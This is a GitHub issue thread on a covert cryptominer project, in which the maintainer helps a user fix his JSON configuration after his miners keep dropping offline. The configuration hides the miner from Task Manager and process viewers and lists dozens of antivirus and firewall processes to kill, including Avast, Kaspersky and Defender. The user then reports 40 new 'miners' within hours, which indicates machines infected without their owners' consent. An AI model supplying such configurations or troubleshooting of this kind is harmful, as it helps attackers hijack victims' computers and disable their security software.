### ISSUE TITLE
Somethings off.

### ISSUE THREAD

**Issue by Smurfboi007** [UnamSanctam/SilentCryptoMiner#155]
Hello! So I've had this running with the web panel for about 20 days now, and something just seems off. I get a lot of miners, but they disappear after a short while. It also says on the status "stopped" even tho there's nothing wrong with them.

Video of what I mean: https://youtu.be/ad-cl_DZuUs

Here's a example of one that has stopped:
![2021-12-18 12_56_55-iDqnnez Web Panel _ iDqnnez och 2 sidor till - Privat – Microsoft​ Edge](https://user-images.githubusercontent.com/68959201/146640307-f49aedbe-72d3-478f-830f-7201ea574fff.png)
 
As far as I can see it should be working. The thing is that most of them become like this after maybe just 1-2 days. Any ideas on what It could be?

**Comment by UnamSanctam** [comment]
Stopped means that the pool has closed the connection (or something similar) so most likely it's your pool doing it.

**Comment by Smurfboi007** [comment]
Alright, though I'm using nanopool. Have you experienced something like this using nanopool?

**Comment by Smurfboi007** [comment]
Also does the miner work on Windows 11? (I do not have the ability to test it)

**Comment by Brainshot** [comment]
> Alright, though I'm using nanopool. Have you experienced something like this using nanopool?

i think your pool is wrong its "bio123.net"

**Comment by Smurfboi007** [comment]
Not in the config...

**Comment by UnamSanctam** [comment]
Nanopool works fine, and the miner works on Windows 11 as well. But as Brainshot said your pool seems to be bio123.net.

**Comment by Smurfboi007** [comment]
Hmm, strange I have actually never used anything like bio123.net. Here is the config:

{
    "url": "stratum://0x00000000000000000000000000000000000@eth-eu1.nanopool.org:9999/{COMPUTERNAME}/joe20.doe_jr-ny%40acme.com",
    "algo": "etchash",
    "max-gpu": 50,
    "idle-wait": 2,
    "idle-gpu": 80,
    "stealth": true,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe"
    "kill-targets": "afwServ.exe,aswEngSrv.exe,aswidsagent.exe,aswToolsSvc.exe,AvastSvc.exe,AvastSvc.exe,AvastUI.exe,wsc_proxy.exe,AvastBrowser.exe,AvastNM.exe,ashwebsv.exe,aswupdsv.exe,kavfswp.exe,kavtray.exe,kavfsmui.exe,kavshell.exe,kavfsrcn.exe,kavfs.exe,kavfsgt.exe,kavfswh.exe,kavfsscs.exe,efpeadm.exe,VPNGUI.exe,CVPND.exe,IPSECLOG.exe,cfp.exe,fsdfwd.exe,fsguiexe.exe,blackd.exe,kpf4gui.exe ,MSSCLL.exe,MCSHELL.exe,MPFSERVICE.exe,MPFAGENT.exe,nisum.exe,smc.exe,persfw.exe,pccpfw.exe,WINSS.exe,ZLCLIENT.exe,MCODS.exe,MCSHIELD.exe,msmpeng.exe,navapsvc.exe,avkwctl.exe,fsav32.exe,mcshield.exe,ntrtscan.exe,avguard.exe,ashServ.exe,AVENGINE.exe,avgemc.exe,tmntsrv.exe"
}

**Comment by UnamSanctam** [comment]
The "stealth-targets" line there is missing a comma (,) at the end.

**Comment by Smurfboi007** [comment]
Like this?
"stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe,"

**Comment by UnamSanctam** [comment]
No at the full end like "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",

**Comment by Smurfboi007** [comment]
Alright, then that's the problem. Would it reconfigure directly if I just edit the Pastebin document?

**Comment by UnamSanctam** [comment]
Yes then it should work, you could optionally also change the "url" to the more easily readable version that should work as well:
```
"stratum://`0x00000000000000000000000000000000000.{COMPUTERNAME}/joe20.doe_jr-ny@acme.com`@eth-eu1.nanopool.org:9999
```

**Comment by Smurfboi007** [comment]
Alright so something like this:

{
"url": ""stratum://`0x00000000000000000000000000000000000.{COMPUTERNAME}/password123`@eth-eu1.nanopool.org:9999",
"algo": "etchash",
"max-gpu": 50,
"idle-wait": 2,
"idle-gpu": 80,
"stealth": true,
"stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
"kill-targets": "afwServ.exe,aswEngSrv.exe,aswidsagent.exe,aswToolsSvc.exe,AvastSvc.exe,AvastSvc.exe,AvastUI.exe,wsc_proxy.exe,AvastBrowser.exe,AvastNM.exe,ashwebsv.exe,aswupdsv.exe,kavfswp.exe,kavtray.exe,kavfsmui.exe,kavshell.exe,kavfsrcn.exe,kavfs.exe,kavfsgt.exe,kavfswh.exe,kavfsscs.exe,efpeadm.exe,VPNGUI.exe,CVPND.exe,IPSECLOG.exe,cfp.exe,fsdfwd.exe,fsguiexe.exe,blackd.exe,kpf4gui.exe ,MSSCLL.exe,MCSHELL.exe,MPFSERVICE.exe,MPFAGENT.exe,nisum.exe,smc.exe,persfw.exe,pccpfw.exe,WINSS.exe,ZLCLIENT.exe,MCODS.exe,MCSHIELD.exe,msmpeng.exe,navapsvc.exe,avkwctl.exe,fsav32.exe,mcshield.exe,ntrtscan.exe,avguard.exe,ashServ.exe,AVENGINE.exe,avgemc.exe,tmntsrv.exe"
}

**Comment by UnamSanctam** [comment]
Yes except the beginning extra " after "url", that was accidental, also since you mine ETH you should change the "algo" to `ethash`.

**Comment by Smurfboi007** [comment]
Ok, I'm gonna change to this:
{
"url": "stratum://0x00000000000000000000000000000000000.{COMPUTERNAME}/password123@eth-eu1.nanopool.org:9999",
"algo": "ethash",
"max-gpu": 50,
"idle-wait": 2,
"idle-gpu": 80,
"stealth": true,
"stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
"kill-targets": "afwServ.exe,aswEngSrv.exe,aswidsagent.exe,aswToolsSvc.exe,AvastSvc.exe,AvastSvc.exe,AvastUI.exe,wsc_proxy.exe,AvastBrowser.exe,AvastNM.exe,ashwebsv.exe,aswupdsv.exe,kavfswp.exe,kavtray.exe,kavfsmui.exe,kavshell.exe,kavfsrcn.exe,kavfs.exe,kavfsgt.exe,kavfswh.exe,kavfsscs.exe,efpeadm.exe,VPNGUI.exe,CVPND.exe,IPSECLOG.exe,cfp.exe,fsdfwd.exe,fsguiexe.exe,blackd.exe,kpf4gui.exe ,MSSCLL.exe,MCSHELL.exe,MPFSERVICE.exe,MPFAGENT.exe,nisum.exe,smc.exe,persfw.exe,pccpfw.exe,WINSS.exe,ZLCLIENT.exe,MCODS.exe,MCSHIELD.exe,msmpeng.exe,navapsvc.exe,avkwctl.exe,fsav32.exe,mcshield.exe,ntrtscan.exe,avguard.exe,ashServ.exe,AVENGINE.exe,avgemc.exe,tmntsrv.exe"
}

**Comment by UnamSanctam** [comment]
Yes that looks correct, also surround the wallet, worker and password with ` like so:
```
stratum://`0x00000000000000000000000000000000000.{COMPUTERNAME}/password123`@eth-eu1.nanopool.org:9999
```
It's hard to get the ` visible on GitHub since it's a part of markdown styling.

**Comment by Smurfboi007** [comment]
Yeah, alright will do that! Thanks for the help

**Comment by Smurfboi007** [comment]
Holy sh*t, 40 miners connected in 3 hours... The problem was the config, once again thank you so much!
